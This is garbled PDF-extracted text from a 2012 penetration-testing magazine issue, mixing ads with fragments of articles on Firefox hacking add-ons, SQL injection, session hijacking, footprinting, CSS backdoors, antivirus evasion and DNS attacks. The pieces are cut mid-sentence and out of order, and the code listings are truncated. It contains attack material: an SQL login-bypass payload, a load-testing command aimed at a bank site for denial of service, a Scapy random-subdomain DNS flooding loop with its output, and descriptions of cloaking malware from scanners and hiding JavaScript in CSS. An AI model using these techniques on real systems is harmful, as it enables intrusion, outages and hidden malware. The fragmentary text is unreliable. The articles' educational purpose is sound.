http://sectooladdict.blogspot.com/2011/08/commercial-web-application-scanner.html

http://sectooladdict.blogspot.com/2011/08/commercial-web-application-scanner.html

��

��

� � � � � � � � �

��

��

��

��

��

��

� ��

pwnplug - Dave-ad3-203x293mm.indd 1 1/5/12 3:32 PM

http://pwnieexpress.com/

www.p2sol.com securityservices @ p2sol dot com

:

Apologies for the above marketing gimmick, but it was necessary to grab your attention. We could tell you that we offer superior information security services followed by a highly biased list of reasons, quotes of industry sources, and facts to support our assertions. However, we both know that you know that game, so let’s change the rules and let the truth in our advertisement speak for our work, and maybe you’ll give us the opportunity to let our work speak instead. For the same reasons that clever marketing can sell an inferior product; your entire network can be hacked, starting with one little email. Interested, or shall you skip to the next page?

As a proof in concept, the soft copy version of this document contains custom embedded software control codes designed to gain control over your computer, then masquerading as you, manipulate stock prices using information contained on your system. Buy buy! Sell Sell!. Sound farfetched? Maybe 5 years ago, but that is today’s new paradigm. Forgive the fear tactics, but the point is that skillful social manipulation in conjunction with “embedded software control codes” are the methods used by malicious parties to compromise (gain control of) modern networks. This challenge can only be met with intelligence.

We combine software engineering, security know how, and data analysis to offer real world peer based metrics of your security issues as well as deep dive technical assessments ranging from penetration / technical assessments to strategic reviews.

Contact: Shohn Trojacek - [email protected] 120 N. MAIN BRYAN, TX 77803 Tel 939.393.9081

Security Services

$50,000 Firewall ruined by a lack of cents!

A UDI T S U P P O R TStrategic and Technical assessments for audit firms, audit, and IT departments:

• Penetration Testing • Security Assessments • Disaster Recovery • Special Projects

PE E R B A SE D E VA LU A TI O N

Ongoing comparison against peers of key IT security metrics and controls. Periodic reporting of key metrics.

S TA TI S TI C A L PE N E TR A TI O N

Periodic rotation of professional penetration testers against your network via a custom portal complete with the ability to limit the scope and depth of testing according to client needs.

U SE R E D UC A TI O N

Custom security training exercises for your organizationincluding use of penetration tests as a way of providing users an unforgettable experience.

S E R V I C E S A V A I L A B L E • $250,000 Intrusion Detection System • $50,000 Redundant Firewalls • $300,000 Salaries for IT Security Personnel • $400,000 Gee Whiz Computer Defense Shield

Hacked because someone used password123 as a “temporary” password…….

Sleep better with our D3tangler™ technology!

Our new patent pending D3tangler technology helps you win the evolving game of IT security. The technology solves all your security problems by pressing a button! Don’t be fooled by cheap competitor’s products!

http://www.p2sol.com/

OVERALL


Web Services can convert your application into a Web-application, which can publish its function or message to the rest of the world.

The basic Web Services platform is XML + HTTP.A web service is just a system which resides

somewhere on a network and gives response specific requests from clients. Here you must be aware of the term clients, clients are not only the people working on their computers on the desk, and it can also be some machines.

Web Services are just a simple combination of different technologies that allow for making connections between different computers, machines, people over internet. Here you must be aware about why we are using the term Services, so web is just a term or another

name for internet but services provides us connectivity with other users over internet or web.

A Web service is a communication service or method through which machines (Computers, Mobiles, Notebooks, and PDA etc) can communicate over the web (internet). It is a great step towards simple access to software and data over the network; it will be easier if you see the Figure 1 which I have sketched out here.

Here our web client is looking for a web page www.google.com as you can see in our example, so just open your browser and put the URL and hit the Enter button, now this request is received by Google web server and it sends the Google webpage to your browser, you can skip all the deeper functionalities about how it works. So the basics are simple.

Web Services and TestingThe articles listed below provide an overview about web-services and its testing. The main purpose of this article is to give an overview in testing web services. This article would be helpful for testers, developers, Project Managers who does not have more technically strong in web services field. Service-oriented architecture (SOA) and web services are very popular topics in many development projects.

Figure 1. Interaction between web client and google web server

http://www.google.com

OVERALL


These add-ons when installed inside a browser can add additional functionality to the browser and this additional functionality can be used on

the web pages that are viewed by the user.The best part about these add-ons is that they enable

third-party developers to add new features without interfering with the original source code of the host application. These add-ons are dependent on the services that are provided by the host application to register themselves. Thus, third party developers can update their add-ons without making any changes to the host application as the host application operates independently. These add-ons can serve for scatterbrained as well as for informative purposes like hacking, penetration testing, and more.

Mozilla Firefox Add-onsMozilla Add-ons (https://addons.mozilla.org/en-US/firefox/) is a huge repository for add-ons that support Mozilla software like Mozilla Firefox browser. These add-ons are submitted by many developers from across the globe for end-users. Using the privacy and security add-ons from this gallery, we can build a good browser based application for penetration testing and security purposes.

Pen Testing Add-onsTorTor: Experts always suggest that it’s best to hide your identity before getting involved in any security related operations. Tor allows user to maintain online anonymity. Tor basically has a worldwide network of servers that helps route the internet traffic and thus, disguise a user’s geographical location. The best thing about Tor is that it’s open-source and anybody can use Tor network for free.

• To setup Tor, you need to first download the Tor Browser Bundle from Link: https://www.torproject.org/download/download.html.en. This bundle will will ask your permission to extract a bundle of files to the location where Tor installer was downloaded.

• Now, Start Tor Browser. Once you’re connected to the Tor Network, the browser (Firefox 3.6.20) will automatically open up with a congratulations message that your IP address is now changed. For example, my IP address changed to 85.223.65.238, which is located in Netherlands.

WHOISWHOIS: Internet resources such as domain name, IP addresses or controller systems are registered in database systems. WHOIS is used to query the

Ready Your Firefox for PentestingAlthough even today web browsers serve the primary purpose of bringing information resources to the user, they no longer represent a software application with bare bones support for just HTML. Today, web browsers like Mozilla Firefox come with the support of add-ons, which are small installable enhancements to a browser’s foundation.

https://addons.mozilla.org/en-US/firefox/



https://www.torproject.org/download/download.html.en

https://www.torproject.org/download/download.html.en

OVERALL


name, IP address and server location. Right clicking on the flag will let you access additional information about the web site using external lookups such as DomainTools WHOIS, WOT Scorecard, McAfee SiteAdvisor and many more. You can also add additional lookups which you find necessary. Clicking on the flag icon will by default take you to Geotool, which Flagfox’s default action (see Figure 2) (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/flagfox/).

Exploit Database SearchExploit Database Search: The Exploit Database (http://exploit-db.com/) is an archive of more than 15000 exploits and software vulnerabilities. This exploit database is a great place for information security researchers and penetration testers for getting an exploit’s information in plain text format.

Offsec Exploit-db Search: This add-on simply adds Offsec Exploit Archive search among other installed search engines in your Firefox. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/offsec-exploit-db-search/).

SQL InjectionSQL Injection: Database applications are critical in today’s web scenario. If a database application is unable to filter out escape characters then it becomes very easy for malicious users to perform SQL code injection on a vulnerable application. Using this, a malicious user can gain access to the server and can delete or modify records. Recently websites like Kathmandu Metropolitan City, Metropolitan UK Police, Nepal Telecommunications Authority, BART Police Database and NASA Forum were exposed of the SQL

databases for cognizing the data about the resource, assignees, registrants and administrative information.

Flagfox: This extension introduces a flag icon on the right hand side of your address bar (see Figure 1). This flag shows the web server’s physical location. Hovering over the flag will display information such as domain

Figure 2. Flagfox in Firefox 6.0

Figure 1. Vidalia Control Panel

Figure 3. Geotool lookup of a website

https://addons.mozilla.org/en-US/firefox/addon/flagfox/

https://addons.mozilla.org/en-US/firefox/addon/flagfox/

http://exploit-db.com/

http://exploit-db.com/

https://addons.mozilla.org/en-US/firefox/addon/offsec-exploit-db-search/



OVERALL


injection vulnerability. Thus, SQL injection plays an important part in any pen testing routine.

SQL Inject Me 0.4.5: This add-on comes from a leading information security firm-Security Compass. This add-on will test a website for SQL injection vulnerabilities by substituting HTML form values with crafted database escape strings that are used in an SQL injection attack. Although this extension will not try to expose the security of a website, it’ll look for database error messages in the page. Hence, just like a web vulnerability scanner, this extension will enumerate the possible entry points without intruding into the system. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/).

• To use this add-on you need to go to Tools > SQL Inject ME > Open SQL Inject Me Sidebar.

• Once you’re at a login page or on a HTML form, you can test this add-on by clicking the ‘Test all forms with all attacks’ buttons in the sidebar to test that particular page (see Figure 5).

Cross-site scriptingCross-site scripting (XSS): XSS vulnerability is usually found in web applications. In this attack, a malicious user crafts a URL of a vulnerable website in such a way that when the malicious code is executed then client’s session cookie is sent to the malicious user. This enables him to steal sensitive information from client’s account. The crafted malicious link can easily embedded a HTML document inside a frame using inline HTML frame tag

<iframe>…</iframe>. Recently websites like Bing.com (MAPS), Google Appspot, Forbes, EC Council and Samba Web Administration Tool (SWAT) were exposed of the XSS vulnerability.

XSS Me 0.4.4: This tool works in the same way as SQL Inject Me. This add-on detects reflected XSS vulnerabilities and points out the possible entry points for an attack. This add-on shows the resulting HTML page as vulnerable only when JavaScript value (document.vulnerable=true). XSS Me comes from SecCom Labs. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/xss-me/).

Access VulnerabilityAccess Vulnerability: Web servers can sometimes be affected by file access vulnerability where a malicious user uses a mere web browser to get unauthorized access to the files stored on the server. This vulnerability doesn’t allow the malicious user to delete, modify or create a file; the user can only read or copy the file from the computer. The malicious user gets access to the file by specifically requesting its name by using a non-standard URL for bypassing the file access controls of the server.

Access Me 0.2.4: Web applications affected by access vulnerability are tested with four different methods. File access requests are sent by using session

Figure 4. Offsec Exploit Archive Search

Figure 5. Offsec Exploit Archive Search

Figure 6. XSS Me Test Results

Figure 7. Access Me Test Summary

https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/

https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/

https://addons.mozilla.org/en-US/firefox/addon/xss-me/

https://addons.mozilla.org/en-US/firefox/addon/xss-me/

OVERALL


removed method, HTTP HEAD verb (retrieve whatever information in the form of an entity without returning a message-body in the response), SECCOM verb, and a combination of session and HEAD/SECCOM. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/access-me/).

User AgentUser Agent: User agent is basically a client side application like web browser or search engine crawlers. User agents strings store information like type of application, OS, and software version. This user agent string is detected by websites for adjusting the page design layout. Hence, user agent spoofing is done by web scrapers and spam bots for forcing certain server side contents to show up by hiding the browser’s identity. For example, Android browser uses HTML rendering engine – WebKit (KHTML) and so Android browser pretends to be Safari.

User Agent Switcher 0.7.3: This add-on by Chris Pederick helps change your browser’s user agent string to Internet Explorer, Search Robots (Googlebot 2.1, Msnbot 1.1, and Yahoo Slup) or iPhone 3.0. To access User Agent Switcher go to Tools > Default User Agent. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/).

HackbarHackbar: Hackbar 1.6.1 is a simple but powerful penetration and security audit tool. Basically you put a link in the hackbar and then you have to select various suitable options from the drop down menu and then just

execute the edited URL. Hackbar is capable of encrypting a text or link to its MD5, SHA-1, SHA-256 or ROT13 hash format. Hackbar also has an encoder-decoder which can perform Base64/URL/HEX encoding and decoding. SQL and XSS options of this add-on will help you add statements into your URL, like for example clicking on Union Select Statement under SQL will give the output: UNION SELECT 1,2,3,4,5,6,7,8,9,10. The other amusing uses are viz., string reverse, insertion of Lorem Ipsum text, fibonacci series and more. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/).

Tamper DataTamper Data 11.0.1: Tamper data can effectively be used for testing web based applications. This add-on will allow you to intercept the HTTP(S) traffic between your computer and the Internet. You can track and modify HTTP(S) headers, POST and GET request parameters. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/).

• Once you install Tamper Data, go to Tools > Tamper Data. This will open a log window. Click Start Tamper from the top menu to start tampering with the HTTP(S) requests. The log will start showing you all the subsequent requests after you start tampering. To see details of a request you need to select the item and double click it to see details of a request header.

Figure 8. User Agent Switcher Menu

Figure 9. Hackbar

Figure 10. Tamper Data Log Window

Figure 11. Tamper with request

https://addons.mozilla.org/en-US/firefox/addon/access-me/

https://addons.mozilla.org/en-US/firefox/addon/access-me/

https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

https://addons.mozilla.org/en-US/firefox/addon/tamper-data/


OVERALL

Page 48 http://pentestmag.com01/2012

If you right click an item and select Replay in browser, then you can modify that item’s parameters like protocol, credentials, port, host, path and you can then click OK to see the URI getting replayed with the modified details that you entered.

• When a request is made through your browser, a pop-up prompts you to – tamper the request, submit it without tampering or abort the request.

• Selecting tamper will show you a tamper window where you can edit the data using the context fields, after that you can submit the modified values. Tamper data is particularly useful when username and password parameters are passed through an HTTPS request. These parameters show up in the tamper window, which allows you to modify by adding SQL Injection/XSS text to the username/email and password fields.

Cookies Manager+Cookies Manager+ 1.5.1: This add-on can edit domain, path and name of multiple cookies. The edited cookies can be saved as new entries or can replace the old entries. Apart from this, the add-on can backup and restore all or selected cookies, export cookie information onto your clipboard and automatically monitor cookies changes. Please remember the fact that you can only edit cookies from your current session, once the session ends, the cookies will expire because we are using the bundled Firefox browser that came with Tor. (Add-on Link: https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/).

ConclusionIt is quite simple for a pen tester to make a good pen testing application from a freely available browser like Firefox. The Firefox project was released back on November 9, 2004, thus, the number of add-ons that are available for the Firefox community is in large numbers. This makes it a lot easier for even beginners to use third party add-ons for converting their browsers to something as strong as a hacking application. Due to the large number of add-ons available for Firefox, one should also understand that there are a lot of alternate add-ons available for doing the same XSS, SQL Injection or HTTP requests modify / replay.

In the beginning we used Tor Browser Bundle because it’s portable, doesn’t store any history logs and you can relocate the browser and Tor to any computer you like without installing anything. Also, once you install all your important add-ons on the browser that is used by Tor Browser Bundle, the add-ons stays with the browser and you don’t need to install them every time you change systems. An older version of Firefox (Firefox 3.6.20) was used because most add-ons are compatible with this version and not with the latest 6.0 or 7.0b1 versions of the browser. u

ER. DHANANJAY D. GARGThe author holds a Bachelor’s Degree in Electronics & Telecommunication. He likes working on projects related to information security. He holds a diploma in Cyber Law and Information Security & Ethical Hacking. As a freelance writer, he often writes on topics related to computer sciences. He has written articles for

journals like PenTest Magazine, Data Center Magazine and Enterprise IT Security Magazine. He can be reached out at: [email protected].

Figure 12. Tamper Data Context Field Modify Window

Figure 13. Cookies Manager+

https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/

https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/


��

��

��

��

��

� ��

� � ��

� ��

� � ��

� ��

� � ��

��

��

��

http://www.radware.com/

OVERALL


We will look at each of these vulnerabilities from the outside as an attacker would as well as inside the source code where they reside

and your developers program them. We will then offer solutions on how to fix them and offer more secure software to your enterprise.

Many of my colleagues participate in black box testing rather than white box testing. Black box testing is also known as zero knowledge testing where the testing team is provided no knowledge of the resource to be tested and has to acquire information on its own.

The purpose of this article is to discuss white box testing or having full knowledge of the source code and how the application works. I believe this is important when doing a penetration test to get a full threat picture of the application that you are looking at.

Another point to bring up is the earlier that this is completed in the software development life cycle the cheaper it is to fix as well as lower attack surface your application has.

To understand these commands more fully it is important to understand the TCP/IP handshake process. TCP/IP is a stateless protocol sending response and requests through GET, POSTS and HEAD. Cookies often times store state data as well as authentication and tracking data that may or not be sensitive.

With a proxy tool like Burpe Suite, http://portswigger.net/burp/, Open Web Application Security Framework Web Scarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project Or Tamper data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ all client side validation can be bypassed and direct commands can take place on the server through a man in the middle proxy.

For this basic understanding now we can completely understand how SQL Injection, Cross Site Scripting and Cross Site Request Forgery work.

SQL injection is a web application security attack that can be devastating to an application. SQL injection at its most basic level is mixing code and database commands to extract, modify or delete data in the database.

SQL injection can allow an attacker to bypass login functions or extract data. One of the simplest SQL injection attacks to bypass authentication is ‘ or 1=1-- (Pasted from http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/).

The source code for this would look something like this.

Select * From User Where The problem with this code snippet whether it be in Java, .NET, PHP or any language that you chose is that the value of the USER is not validated and the

Web ApplicationSecurity Vulnerabilities Have Been Prevalent The

Last Decade

Port 80 and Port 443 has been a great attack vector for malicious attackers. This article will discuss the three most common and devastating software security vulnerabilities. SQL injection, Cross Site Scripting and Cross Site Request Forgery.

http://portswigger.net/burp/

http://portswigger.net/burp/

https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project



http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

http://www.clicksecurity.com

http://www.quickcert.com/

ATTACK


Session hijacking is the exploitation of a valid user session to gain unauthorized access to information or services in a computer system.

In particular, it is used to refer to the theft of a cookies used to authenticate a user to a remote server. When implemented successfully, attackers assume the identity of the compromised user, enjoying the same access to resources as the compromised user.

Session hijacking, also known as TCP session hijacking, allows a user to take control over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user’s session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.

The session ID is normally stored within a cookie or URL. For most communications, authentication procedures are carried out at set up. Session hijacking takes advantage of that practice by intruding in real time, during a session. The intrusion may or may not be detectable, depending on the user’s level of technical knowledge and the nature of the attack. If a web site does not respond in the normal or expected way to user input or stops responding altogether for an unknown reason, session hijacking is a possible cause.

Because http communication uses many different TCP connections, the web server needs a method

to recognize every user’s connections. The most useful method depends on a token the Web Server sends to the client browser after a successful client

Session Hijacking

Even if you were drunk and surfing at a Wi-Fi hotspot, you probably wouldn’t stand up and shout your username and password for anyone who might want it. But an attacker does not need to find out your username and password. The attacker’s target might be your session.

Figure 1. Session ID

http://accretivesolutions.com/

ATTACK


As a security analyst, footprinting is also one of the most enjoyable parts of my job as I attempt to outperform the automatons; it is all about

finding that one target that everybody forgot about or did not even know they had, that one old IIS 5 webserver that is not used, but not powered off.

With this article I am going to share some of the steps, tips and tricks that pentesters and hackers alike use when starting on a engagement.

ApproachAs with most things in life having a good approach to a problem will yield better results and overtime as your approach is refined you will consume less time while getting better results. By following a methodology, your footprinting will become more repeatable and thus reliable. A basic footprining methodology covers reconnaisance, DNS mining, various information services (e.g. whois, Robtex, routes), network registration information and active steps such as SSL host enumeration.

While the temptation exists to merely feed a domainname into a tool or script and take the output as your completed footprint, this will not yield a passable footprint for two reasons. Firstly, a single tool will not have access to all the disparate information sources that one should consult, and secondly the footprinting process is inherently iterative and continous. A footprint is almost never complete; instead, a fork of the footprint

data provides the best current view of the target, but the information could change tomorrow as new sites are brought online, or old sites are taken offline. Thus as a datum is found that could expand the footprint, a new iteration of the footprinting process triggers with that datum as the seed, and the results are combined with all discovered information.

Know your targetThe very first thing to do is to get to know your target organization. What they do, who they do it for, who does it for them, where they do it from both online and in the kinetic world, what community or charity work they are involved in. This will give you and insight into what type of network/infrastructure you can expect. Reading public announcements, financial reports and any other documents published on or by the organization might also yield interesting results. For any organization that must publish regular reports (e.g. listed companies), these are a treasure trove of information for understanding the target’s core business units, corporate hierarchy and lines of business. All these become very useful when selecting targets.

Dumpster diving, if you are up for it and have physical access to the target, means sifting through trash to get useful information, but in recent times social media can provide us with even more. Sites like LinkedIn, Facebook and Twitter can provide you with lists of

Finding your Target...

Network foot printing is, perhaps, the first active step in the recognisance phase of an external network security engagement. This phase is often highly automated with little human interaction as the techniques appear, at first glance, to be easily applied in a general fashion across a broad range of targets.

ATTACK


Search forms can include common attack vectors (SQL, XSS etc) which can be found during the penetration tests, and these forms also leave

open doors to DoS attacks. Especially, the attacks with wildcard queries or the attacks using the maximum number of database search results can cause an outage on the target application.

Many of today’s applications have prevention against attack vectors like wildcards queries. But this still does not mean that they are not exposed to Denial of Service attacks. Simple search (space, only one character, etc.) is not as effective as wildcard attacks. But even the simple search queries; increase the application server’s response time if you find a good way to the increase the amount of database results. With this in mind, the Advanced Search

feature of the applications will create complex (containing more than one keyword like bank account, money, credit) queries and as a result of these complex queries the number of results will be greatly increased.

There is a good advanced search form in our target web application as you can see at below; you can change presentation, score, period etc. It will be a good

Search Form Based DoSMany of today’s applications have prevention against attack vectors like wildcards queries. But this still does not mean that they are not exposed to Denial of Service attacks. Simple search (space, only one character, etc.) is not as effective as wildcard attacks. But even the simple search queries; increase the application server’s response time if you find a good way to the increase the amount of database results.

Figure 1. Advanced search

Figure 2. Bank money transfer

Listing 1. bunyamin@symturk

[bunyamin@symturk]# ab -n 1 -c 1 -f ALL http://

www.bank.com/

00:10:16 2162.780 [ms] (mean, across all concurrent requests)







ATTACK


So it wouldn’t be smart to block that user from the system as the Apache threads spawning from the main process (which is running as root in

order to be able to bind to port 80 and / or 443) should never run as root but as an unprivileged user instead.

Sometime ago, I discovered a couple of persistent (stored) Cross-Site Scripting vulnerabilities in vBulletin [1] [2], where the first was simply found with standard research but also a bit of luck [4] [5], while RSnake’s XSS Cheatsheet [3] was used to aid me in bypassing the custom Anti-XSS filter inside vBulletin.

All of this was great, but as I dived deeper into executing JavaScript via CSS (Cascading Style

Sheets), I realized at that time, that attackers, such as knowledgeable script kiddies, or black hats, could hide a JavaScript payload in one of the CSS files. vBulletin uses e.g., over 100 CSS files for each style, and if the CSS changes are stored only inside the database, an unaware administrator may not realize his or her installation of vBulletin has been compromised as they may be unaware of backdoors can hide in CSS.

How to execute JavaScript in CSSFirstly, it’s important to know how it is possible to even execute JavaScript inside the templates or files, which are essentially the same as they are loaded with the

HTML page. There are of course limitations to these backdoors, as the page may not load the entire CSS library at once and therefore, the most appropriate CSS file for infection must be chosen. But how is it possible? (Check Listing 1)

In fact, I’m not even sure that I’ve collected most of the known possible ways, but after reading through RSnake’s XSS Cheatsheet [3], and while searching through the Internet I came up with a nice list as seen in Listing 2.

As you can see, these are just some of the ways, where most, if not all of them, are mentioned at RSnake’s website. With HTML5 and CSS3, where the latter is the most important in this case, new vectors enabling JavaScript will most likely be possible.

CSS Backdoors Hiding Malicious Payloads Inside Cascading Style

Sheets

When a website gets compromised a new file is often created by the attacker, where he or she can sometimes do almost the same on the system as any other user. On Linux the user used to help the attacker is www-data, which is by default used for serving Apache threads.

Figure 1. Screenshot of JavaScript execution inside a CSS �le on vBulletin

http://www.sptechcon.com/boston2012/

ATTACK


These entire websites are created with the same CMS. The CMS (Content Management System) is a web application system that has many

tools for helping the web master to author content, customization of the theme, administration website, user management, etc.

Although, the web master does not understand anything about web programming, he can still create a beautiful or nice websites because CMS is managed via a web interface. The web master can add a new feature to CMS by installing a new plugin. A web master just has to click, click and click, then valla! the new website has been created. The coin has 2 sides, the bad side is if someone can find a vulnerability in the core of the CMS or well-known plugin, he can then hack all websites that used the vulnerable CMS or vulnerable plugin too. In this article, I will discuss how to pentest 3 well-known

CMS: Joomla, Drupal and Wordpress. This tutorial will show you how to get the information for the common CMS websites and how to pentest them.

Identify the webFirst thing we must know before pentesting the website is what CMS was used? Because each CMS has different default files or structure. All these different things create the signature of each CMS. We can analyze the target website with the following 2 methods.

By manual testingNormally, when a user installed CMS is complete, he often forgets to remove unnecessary files from the website. Those files will be the signature of the CMS and default configurations will let us know what CMS was used.

How to pentest well-known CMSToday, a new website is created about every minute. Anybody can be an owner of a website today very easily. Most new websites have the same look,page structure, different colors, only difference is the logo of the website.

Figure 1. Example administrator page of Joomla (http://192.168.253.128/1/administrator/)

Figure 2. Example administrator page of Wordpress (http://192.168.253.128/3/wp-login.php)

��

CloudPassage Halo is the award-winning cloud server security platform with all the security functions you need

to safely deploy servers in public and hybrid clouds. Halo is FREE for up to 25 servers.

cloudpassage.com/pen

http://cloudpassage.com/pen

ATTACK


I ’ve examined the next web antiviruses: Web Virus Detection System, Google, Yahoo, Yandex, Norton Safe Web, McAfee SiteAdvisor, StopBadware. And

every web antivirus can face with malware’s attempts to hide from it (so malware will left undetected and continue to infect visitors of web sites). In this article I’ll describe methods of bypassing of web antiviruses, which developers of such system need to take into account to prevent possibilities of malware to hide from them.

Bypassing of systems for searching viruses at web sitesIn May 2010 I’ve published the article to The Web Security Mailing List Archives [3] about bypassing systems for searching of viruses at web sites. This concerns all systems for searching of viruses at web sites, including search engines with built-in antiviruses, which have no counter-measures against it.

Bypassing systems for searching of viruses at web sites is possible with using of cloaking (which is known from 90s and is used for hiding from search engines bots for SEO purposes). When User Agent is analyzing and if it’s a search engine, then malicious code is not shown, if it’s a browser – then shown. So the same cloaking which used for SEO, can be used for malware spreading and hiding from systems for searching of viruses at web sites. Particularly from search engines

with built-in antivirus systems, because they are using bots of search engines with known user agents.

I saw the using of cloaking method in malicious scripts many times during my researches since 2008. Particularly I saw checking of Referer (and similar approach can be used for User-Agent). And these method of protection of malicious code from systems for searching of viruses create serious challenge for these systems.

Antivirus companies and other security researchers are also sometimes finding cases of using cloaking against search engines with built-in antiviruses. Example: in May 2010 many web sites on shared-hosting at DreamHost and other hosting providers were hacked and infected with malicious code, and the code for distributing of malware was using a cloaking for hiding itself from built-in antiviruses in search engines Google and Yahoo.

Effective use of cloaking against web antivirusesIn the end of August 2011 I’ve found that Google started using User-Agent spoofing for its bots. Which can be concerned with the desire to improve their system for searching viruses at web sites – so with using of cloaking (UA spoofing is type of it) to decloak viruses at web sites.

But it uses spoofing ineffectively and with considered use of cloaking the malware can effectively hide from

Bypassing Web AntivirusesAt beginning of April 2010 I’ve made the testing of systems for searching of viruses at web sites [1]. In my research I have examined different systems for searching of viruses at web sites, as standalone, as built-in the search engines – these systems can be called as web antiviruses. And later I have presented my results of testing of web antiviruses on conference UISG and ISACA Kiev Chapter #6 [2].

ATTACK


DNS was proposed by Paul Mockapetris in 1983 (in RFC’s 882 and 883), as a distributed and dynamic database – as opposed to the single

table on a single host that was used by the earlier version of the internet, ARPAnet. Together with Jon Postel, he is considered the inventor of DNS.

Structure of a DNS packetID – A 16 bit identifier assigned by the program that generates any kind of query. This identifier is copied to the corresponding reply and can be used by the requester to match up replies to outstanding queries.

QR – A one bit field that specifies whether this message is a query (0), or a response (1).

OPCODE – A four bit field that specifies kind of query in this message.

AA Authoritative Answer – this bit is only meaningful in responses, and specifies that the responding name server is an authority for the domain name in question. This bit is used to report whether or not the response you receive is authoritative.

TC TrunCation – specifies that this message was truncated.

RD Recursion Desired – this bit directs the name server to pursue the query recursively. Use 1 to demand recursion.

RA Recursion Available – this be is set or cleared in a response, and denotes whether recursive query support is available in the name server. Recursive query support is optional.

Z – Reserved for future use.RCODE Response code – this 4 bit field is set as part of

responses. The values have the following interpretation:

0 – No error condition1 – Format error – The name server was unable to

interpret the query.2 – Server failure – The name server was unable to

process this query due to a problem with the name server.

How to Successfully Attack DNS?DNS is a very attractive to attack as very often IT administrators forget to implement measures to secure DNS service. DNS listens on port 53 where UDP is used to resolves domain names to IP addresses and vice versa. It can also enlist TCP on the same port for zone transfer of full name record databases. It is estimated that 20% of total Internet traffic amount is DNS traffic.

Figure 1. Domain name system

ATTACK


Listing 1. Output

Welcome to Scapy (2.2.0)

>>>top_level = ".rs"

>>>domain = "example"

>>>cnt = 1000

>>>dns_server = "10.123.11.2"

>>>

>>>for i in range(0, cnt):

... s = RandString(RandNum(1,8))

... s1 =s.lower()

... q = s1+"."+domain+top_level

... print i ,q

... sr1(IP(dst=dns_server)/UDP(sport=RandShort())/DNS(

rd=1,qd=DNSQR(qname=q)))

...

0 2dat.example.rs

Begin emission:

.Finished to send 1 packets.

..*

Received 4 packets, got 1 answers, remaining 0 packets

<IP version=4L ihl=5L tos=0x0 len=114 id=27935 flags=DF

frag=0L ttl=126 proto=udpchksum=0x59ed src=10.123.11.2

dst=10.123.21.119 options=[] |<UDP sport=domain

dport=10385 len=94 chksum=0x21ac |<DNS id=0 qr=1L

opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=n

ame-error qdcount=1 ancount=0 nscount=1 arcount=0

qd=<DNSQR qname='2dat.example.rs.' qtype=A qclass=IN

|> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN

ttl=900 rdata='\x01a\x03nic\xc0\x19\nhostmaster\xc0/

w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\x00$\xea\x00\x00\

x00*0' |>ar=None |>>>

1 e0qysndm.example.rs

Begin emission:

Finished to send 1 packets.

*


<IP version=4L ihl=5L tos=0x0 len=118 id=27937 flags=DF

frag=0L ttl=126 proto=udpchksum=0x59e7 src=10.123.11.2

dst=10.123.21.119 options=[] |<UDP sport=domain

dport=42090 len=98 chksum=0xecab |<DNS id=0 qr=1L

opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=

name-error qdcount=1 ancount=0 nscount=1 arcount=0

qd=<DNSQR qname='e0qysndm.example.rs.' qtype=A

qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA

rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x1d\

nhostmaster\xc03w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\

x00$\xea\x00\x00\x00*0' |>ar=None |>>>

2 ponlj.example.rs

Begin emission:

.Finished to send 1 packets.

*


<IP version=4L ihl=5L tos=0x0 len=115 id=27939

flags=DF frag=0L ttl=126 proto=udpchksum=0x59e8

src=10.123.11.2 dst=10.123.21.119 options=[]

|<UDP sport=domain dport=3015 len=95 chksum=0x21d4

|<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L

z=0L rcode=name-error qdcount=1 ancount=0 nscount=1

arcount=0 qd=<DNSQR qname='ponlj.example.rs.' qtype=A


rclass=IN ttl=900

3 xx.example.rs

Begin emission:


*


<IP version=4L ihl=5L tos=0x0 len=112 id=27941

flags=DF frag=0L ttl=126 proto=udpchksum=0x59e9

src=10.123.11.2 dst=10.123.21.119 options=[]

|<UDP sport=domain dport=56637 len=92 chksum=0xd320

|<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L

z=0L rcode=name-error qdcount=1 ancount=0 nscount=1

arcount=0 qd=<DNSQR qname='xx.example.rs.' qtype=A


rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x17\

nhostmaster\xc0-w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\

x00$\xea\x00\x00\x00*0' |>ar=None |>>>

4 6348lzwk.example.rs

Begin emission:


ATTACK


3 – Name Error – Meaningful only for responses from an authoritative name server, this code signifies that the domain name referenced in the query does not exist.

4 – Not Implemented – The name server does not support this requested kind of query.

5 – Refused – The name server refuses to perform the specified operation for policy reasons.

QDCOUNT – an unsigned 16 bit integer specifying the number of entries in the question section. Set this field to 1, indicating one question.

ANCOUNT – an unsigned 16 bit integer specifying the number of resource records in the answer section.

